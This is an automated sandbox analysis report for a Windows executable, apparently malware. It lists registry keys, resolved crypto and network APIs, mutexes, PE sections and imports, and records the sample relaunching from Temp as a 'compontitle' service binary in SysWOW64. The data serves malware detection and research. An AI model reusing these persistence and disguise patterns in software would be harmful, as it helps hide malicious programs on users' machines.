HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsiproxy\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsi\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NlaSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\netprofm\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\RequiredPrivileges
HKEY_USERS\.DEFAULT\Control Panel\Desktop\SmoothScroll
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernelbase.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.ProcessIdToSessionId
imm32.dll.ImmCreateContext
imm32.dll.ImmDestroyContext
imm32.dll.ImmNotifyIME
imm32.dll.ImmAssociateContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmGetContext
imm32.dll.ImmGetCompositionStringA
imm32.dll.ImmSetCompositionStringA
imm32.dll.ImmGetCompositionStringW
imm32.dll.ImmSetCompositionStringW
imm32.dll.ImmSetCandidateWindow
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptDeriveKey
cryptsp.dll.CryptEncrypt
kernel32.dll.IsProcessorFeaturePresent
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
ole32.dll.CoCreateInstance
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
setupapi.dll.CM_Get_Device_Interface_List_ExW
advapi32.dll.IsTextUnicode
comctl32.dll.#332
comctl32.dll.#338
comctl32.dll.#339
comctl32.dll.#386
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
propsys.dll.InitPropVariantFromBuffer
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
ntdll.dll.EtwUnregisterTraceGuids
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
--f4134209
C:\Users\user\AppData\Local\Temp\nonmanual.exe --f4134209
"C:\Windows\SysWOW64\compontitle.exe"
--ce2bae20
C:\Windows\SysWOW64\compontitle.exe --ce2bae20
gcc-shmem-tdm2-use_fc_key
gcc-shmem-tdm2-sjlj_once
gcc-shmem-tdm2-once_global_shmem
gcc-shmem-tdm2-once_obj_shmem
gcc-shmem-tdm2-mutex_global_shmem
gcc-shmem-tdm2-_pthread_tls_once_shmem
gcc-shmem-tdm2-_pthread_tls_shmem
gcc-shmem-tdm2-mtx_pthr_locked_shmem
gcc-shmem-tdm2-mutex_global_static_shmem
gcc-shmem-tdm2-mxattr_recursive_shmem
gcc-shmem-tdm2-pthr_root_shmem
gcc-shmem-tdm2-idListCnt_shmem
gcc-shmem-tdm2-idListMax_shmem
gcc-shmem-tdm2-idList_shmem
gcc-shmem-tdm2-idListNextId_shmem
gcc-shmem-tdm2-fc_key
gcc-shmem-tdm2-_pthread_key_lock_shmem
gcc-shmem-tdm2-_pthread_cancelling_shmem
gcc-shmem-tdm2-cond_locked_shmem_rwlock
gcc-shmem-tdm2-rwl_global_shmem
gcc-shmem-tdm2-_pthread_key_sch_shmem
gcc-shmem-tdm2-_pthread_key_max_shmem
gcc-shmem-tdm2-_pthread_key_dest_shmem
Global\IA4889F95
Global\MA4889F95
IESQMMUTEX_0_208
compontitle
compontitle

PE Information

Image Base 0x00400000
Entry Point 0x004014e0
Reported Checksum 0x000622e7
Actual Checksum 0x00064f16
Minimum OS Version 4.0
Compile Time 2019-11-14 21:05:36
Import Hash 4151de9accf118d99670f695f3c0da21

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000182b8 0x00018400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_16BYTES 5.98
.data 0x0001a000 0x00014020 0x00014200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_32BYTES 6.87
.rdata 0x0002f000 0x0000325c 0x00003400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_32BYTES 5.44
.bss 0x00033000 0x00000498 0x00000000 IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_32BYTES 0.00
.idata 0x00034000 0x00000e34 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 4.91
.CRT 0x00035000 0x00000038 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 0.31
.tls 0x00036000 0x00000020 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 0.22
.rsrc 0x00037000 0x000004f0 0x00000600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 2.88
/4 0x00038000 0x00000358 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_8BYTES 1.96
/19 0x00039000 0x0000d972 0x0000da00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 6.10
/31 0x00047000 0x00001ffc 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 4.67
/45 0x00049000 0x000020d5 0x00002200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 5.74
/57 0x0004c000 0x00000bc4 0x00000c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_4BYTES 4.70
/70 0x0004d000 0x0000031c 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 4.28
/81 0x0004e000 0x000019f2 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 3.51
/92 0x00050000 0x00000608 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 2.55

Overlay

Offset 0x00046a00
Size 0x000140c5

Imports

Library ADVAPI32.dll:
0x434284 SetFileSecurityW
Library COMDLG32.DLL:
0x43428c ChooseColorA
Library GDI32.dll:
0x434294 CreateSolidBrush
Library KERNEL32.dll:
0x43429c AddAtomA
0x4342a0 CloseHandle
0x4342a4 CreateEventA
0x4342a8 CreateMutexA
0x4342ac CreateSemaphoreA
0x4342b4 DuplicateHandle
0x4342bc FindAtomA
0x4342c0 GetAtomNameA
0x4342c4 GetCurrentProcess
0x4342c8 GetCurrentProcessId
0x4342cc GetCurrentThread
0x4342d0 GetCurrentThreadId
0x4342d8 GetLastError
0x4342e0 GetStartupInfoA
0x4342e8 GetThreadContext
0x4342ec GetThreadPriority
0x4342f0 GetTickCount
0x434300 InterlockedExchange
0x434314 ReleaseMutex
0x434318 ReleaseSemaphore
0x43431c ResetEvent
0x434320 ResumeThread
0x434324 SetEvent
0x434328 SetLastError
0x434330 SetThreadContext
0x434334 SetThreadPriority
0x43433c Sleep
0x434340 SuspendThread
0x434344 TerminateProcess
0x434348 TlsAlloc
0x43434c TlsGetValue
0x434350 TlsSetValue
0x43435c VirtualProtect
0x434360 VirtualQuery
0x434368 WaitForSingleObject
0x43436c WinExec
Library msvcrt.dll:
0x434374 __dllonexit
0x434378 __getmainargs
0x43437c __initenv
0x434380 __lconv_init
0x434384 __set_app_type
0x434388 __setusermatherr
0x43438c _acmdln
0x434390 _amsg_exit
0x434394 _beginthreadex
0x434398 _cexit
0x43439c _endthreadex
0x4343a0 _fmode
0x4343a4 _ftime
0x4343a8 _initterm
0x4343ac _iob
0x4343b0 _lock
0x4343b4 _onexit
0x4343b8 _setjmp3
0x4343bc _unlock
0x4343c0 _write
0x4343c4 abort
0x4343c8 calloc
0x4343cc exit
0x4343d0 fclose
0x4343d4 fopen
0x4343d8 fprintf
0x4343dc fputc
0x4343e0 fputs
0x4343e4 free
0x4343e8 fwrite
0x4343ec longjmp
0x4343f0 malloc
0x4343f4 memcmp
0x4343f8 memcpy
0x4343fc memmove
0x434400 memset
0x434404 printf
0x434408 realloc
0x43440c signal
0x434410 sprintf
0x434414 strcmp
0x434418 strlen
0x43441c strncmp
0x434420 vfprintf
Library USER32.dll:
0x434428 CreateWindowExA
0x43442c DefWindowProcA
0x434430 DialogBoxParamA
0x434434 DispatchMessageA
0x434438 EnableWindow
0x43443c EndDialog
0x434440 GetDlgItem
0x434444 GetDlgItemInt
0x434448 GetDlgItemTextA
0x43444c GetMessageA
0x434450 IsDlgButtonChecked
0x434454 LoadCursorA
0x434458 LoadIconA
0x43445c PostQuitMessage
0x434460 RedrawWindow
0x434464 RegisterClassA
0x434468 SendDlgItemMessageA
0x43446c SendMessageA
0x434470 ShowWindow
0x434474 TranslateMessage

sizetype
long unsigned int
unsigned char
double
float
long double
short int
ix86_tune_indices
X86_TUNE_USE_LEAVE
X86_TUNE_PUSH_MEMORY
X86_TUNE_ZERO_EXTEND_WITH_AND
X86_TUNE_UNROLL_STRLEN
X86_TUNE_BRANCH_PREDICTION_HINTS
X86_TUNE_DOUBLE_WITH_ADD
X86_TUNE_USE_SAHF
X86_TUNE_MOVX
X86_TUNE_PARTIAL_REG_STALL
X86_TUNE_PARTIAL_FLAG_REG_STALL
X86_TUNE_LCP_STALL
X86_TUNE_USE_HIMODE_FIOP
X86_TUNE_USE_SIMODE_FIOP
X86_TUNE_USE_MOV0
X86_TUNE_USE_CLTD
X86_TUNE_USE_XCHGB
X86_TUNE_SPLIT_LONG_MOVES
X86_TUNE_READ_MODIFY_WRITE
X86_TUNE_READ_MODIFY
X86_TUNE_PROMOTE_QIMODE
X86_TUNE_FAST_PREFIX
X86_TUNE_SINGLE_STRINGOP
X86_TUNE_QIMODE_MATH
X86_TUNE_HIMODE_MATH
X86_TUNE_PROMOTE_QI_REGS
X86_TUNE_PROMOTE_HI_REGS
X86_TUNE_SINGLE_POP
X86_TUNE_DOUBLE_POP
X86_TUNE_SINGLE_PUSH
X86_TUNE_DOUBLE_PUSH
X86_TUNE_INTEGER_DFMODE_MOVES
X86_TUNE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_SSE_UNALIGNED_STORE_OPTIMAL
X86_TUNE_SSE_PACKED_SINGLE_INSN_OPTIMAL
X86_TUNE_SSE_SPLIT_REGS
X86_TUNE_SSE_TYPELESS_STORES
X86_TUNE_SSE_LOAD0_BY_PXOR
